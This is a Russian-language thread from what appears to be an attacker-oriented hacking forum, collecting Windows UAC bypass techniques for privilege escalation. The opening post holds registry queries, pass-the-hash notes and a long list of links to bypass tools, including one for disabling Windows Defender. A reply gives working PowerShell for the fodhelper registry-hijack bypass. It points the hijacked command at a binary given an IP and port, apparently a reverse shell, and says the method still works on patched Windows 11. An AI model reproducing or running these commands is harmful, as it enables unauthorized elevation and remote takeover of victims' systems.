• XSS.stack #1 – первый литературный журнал от юзеров форума

PrivEsc UAC Bypass - методы и обсуждение

Отслеживать
IIIIXX

IIIIXX

UAC
Эксперт
Регистрация
16.03.2022
Сообщения
273
Решения
3
Реакции
338
Это не статья, просто решил создать единую тему чтобы не терять информацию, поэтому настоятельно прошу всех участников форума задавать вопросы и делиться новыми методами именно тут.
Все примеры, ссылки на статьи и примеры команд приведенные ниже принадлежат не мне, отдельное спасибо парням с експы p1xel, morgot, CrydBrox за примеры взятые с аналогичной темы там.

Контроль учетных записей (UAC) — это функция безопасности Windows, предназначенная для защиты операционной системы от несанкционированных изменений. Если для внесения изменений в систему требуется разрешение на уровне администратора, контроль учетных записей уведомляет пользователя, предоставляя возможность утвердить или отклонить изменение.

Так же рекомендую ознакомиться с Уровнями целостности
il 1
il 2
il 3 and uac

Узнать включен ли uac
Код: 
REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA

Проверить уровень uac
Код: 
REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v ConsentPromptBehaviorAdmin
REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v FilterAdministratorToken

Просто оставлю это здесь, взято с thehacker.recipes
Код: 
UAC limits pass-the-hash
UAC (User Account Control) limits which local users can do remote administration operations. And since most of the attacks exploiting pass-the-hash rely on remote admin operations, it affects this technique.
   - the registry key LocalAccountTokenFilterPolicy is set to 0 by default. It means that the built-in local admin account (RID-500, "Administrator") is the only local account allowed to do remote administration tasks. Setting it to 1 allows the other local admins as well.
   - the registry key FilterAdministratorToken is set to 0 by default. It allows the built-in local admin account (RID-500, "Administrator") to do remote administration tasks. If set to 1, it doesn't.

In short, by default, only the following accounts can fully take advantage of pass-the-hash:
   - local accounts : the built-in, RID-500, "Administrator" account
   - domain accounts : all domain accounts with local admin rights
Ниже привел ссылки на посты на форуме, так же некоторые ресурсы, которые дают общее представление о том что такое User Account Control, и практические примеры которые мне удалось найти.
HABR: Обход контроля учетных записей (UAC) путем пародирования доверенных директорий
HABR: UAC Bypass и вариации на тему детектирования. Часть 1
HABR: UAC Bypass и вариации на тему детектирования, Часть 2
HABR(2017): UAC Bypass или история о трех эскалациях
HACKTRICKS: some methods
elastic.co: Exploring Windows UAC Bypasses: Techniques and Detection Strategies
juggernaut-sec.com: UAC-Bypass – Windows Privilege Escalation
fortinet: Offense and Defense – A Tale of Two Sides: Bypass UAC
https://github.com/sailay1996/UAC_Bypass_In_The_Wild + https://heynowyouseeme.blogspot.com/2019/08/windows-10-lpe-uac-bypass-in-windows.html
https://github.com/hfiref0x/UACME
https://github.com/k4sth4/UAC-bypass
https://github.com/x0xr00t/Automated-MUlti-UAC-Bypass
https://github.com/wzor/Disable-Windows-Defender-UAC-Bypass
https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/UAC-TokenMagic.ps1
https://github.com/bytecode77/slui-file-handler-hijack-privilege-escalation + https://www.exploit-db.com/exploits/44830/
sevagas.com: Yet another sdclt UAC bypass
medium: UAC Bypass by Mocking Trusted Directories + com + https://habr.com/post/430498/
sevagas.com: MSDT DLL Hijack UAC bypass
heynowyouseeme.blogspot.com: Windows 10 LPE (UAC Bypass) in Windows Store (WSReset.exe)
Статья от ioioio777: Отключаем Windows Defender (+ UAC Bypass, + Повышение до уровня SYSTEM)
https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/
https://tyranidslair.blogspot.com/2018/10/farewell-to-token-stealing-uac-bypass.html
https://www.exploit-db.com/exploits/45660/
https://hydrasky.com/network-securi...-bypass-via-registry-hijacking-on-windows-10/
https://www.rapid7.com/db/modules/exploit/windows/local/bypassuac_silentcleanup/
https://roberthosborne.com/f/fodhelper-uac-bypass-method
 
пару дней назад на последних обновлениях win defender юзал fodhelper для uac win 11 все еще работает, подумаешь всего лишь 7 лет методу...

Код: 
New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force
New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force
Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value "C:\Windows\Tasks\qwe <IP> <port>" -Force

C:\Windows\System32\fodhelper.exe
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх